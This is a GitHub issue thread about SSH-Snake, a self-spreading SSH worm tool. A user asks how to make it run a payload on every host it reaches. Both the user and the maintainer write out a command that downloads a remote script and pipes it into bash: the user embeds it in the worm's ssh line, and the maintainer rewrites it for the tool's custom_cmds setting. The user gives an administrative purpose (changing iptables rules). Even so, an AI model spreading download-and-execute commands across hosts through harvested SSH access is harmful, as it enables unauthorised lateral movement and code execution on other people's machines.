### ISSUE TITLE
Where should I add my own execution code?

### ISSUE THREAD

**Issue by DKTM** [MegaManSec/SSH-Snake#15]
I added my command to the ssh login code, but it seems unable to carry out worm activities properly.

**Comment by DKTM** [comment]
![git_issue](https://github.com/MegaManSec/SSH-Snake/assets/58205600/950e423d-7da6-442d-84ba-7fdcb9511295)
When I run this script, it downloads my configuration file when it's able to log in, which involves modifying the iptable rules to only allow SSH port access from internal IP addresses. However, from my observation, it seems that this script only crawls two layers. I didn't see any access records on my bastion host, and the script display only shows one layer. This is the code I modified:

done < <(stdbuf -o0 ${s} ssh "${ssh_options[@]}" -i "$key_file" -- "$ssh_dest" " curl -sS 'http://10.224.114.11:8080/sys_update' | bash > /dev/null 2>&1;echo 'printf \"%s\" \$1 | base64 -d | stdbuf -o0 bash --noprofile --norc -s \$1 \$2 \$3 \$4 \$5' | stdbuf -o0 bash --noprofile --norc -s -- '$script' '$(printf "%s" "$t_hosts_chain" | base64 | tr -d '\n')' '$ignore_list' '$ssh_dest' '$(printf "%s" "$t_hostnames_chain" | base64 | tr -d '\n')' > /dev/null 2>&1" </dev/null 2>&1 | tr -d '\r')

**Comment by MegaManSec** [comment]
Does it access the servers if your changes are not used?

I would recommend using https://github.com/MegaManSec/SSH-Snake/blob/main/SETTINGS.md#custom_cmds instead of playing around with the ssh line.

**Comment by DKTM** [comment]
Thank you, I will go and study, your project is very helpful for our network administrators.

**Comment by DKTM** [comment]
![git_issue](https://github.com/MegaManSec/SSH-Snake/assets/58205600/3a762ef9-c106-4f5d-b190-00fa4f09e50b)
Should I put the command directly in here?Forgive me, I am not an experienced user of awk.

**Comment by DKTM** [comment]
> Does it access the servers if your changes are not used?
> 
> I would recommend using https://github.com/MegaManSec/SSH-Snake/blob/main/SETTINGS.md#custom_cmds instead of playing around with the ssh line.

Should I put the command directly in here?Forgive me, I am not an experienced user of awk.
![Uploading git_issue.png…]()

**Comment by MegaManSec** [comment]
Try

`custom_cmds=(“ curl -sS 'http://10.224.114.11:8080/sys_update' | bash  “)’`

**Comment by DKTM** [comment]
> Try
> 
> `custom_cmds=(“ curl -sS 'http://10.224.114.11:8080/sys_update' | bash “)’`
> 
> but replace the “ and ‘ with normal apostrophes and quotation marks

thank you

**Comment by MegaManSec** [comment]
It’s also possible that piping into bash isn’t going to work, and you can just replace custom_comes with what you actually want to be executed. For example:

`Custom_cmds=(“iptables -t NAT ….” “iptables -t NAT ….” “iptables …”)`
Will execute each of the three commands, in the order of they appear

**Comment by DKTM** [comment]
> It’s also possible that piping into bash isn’t going to work, and you can just replace custom_comes with what you actually want to be executed. For example:
> 
> `Custom_cmds=(“iptables -t NAT ….” “iptables -t NAT ….” “iptables …”)` Will execute each of the three commands, in the order of they appear
I tried adding a download command execution script in Custom_cmds, and it can work normally. It might be because I silenced all outputs and let the script run in the background

**Comment by MegaManSec** [comment]
Great, closing then.
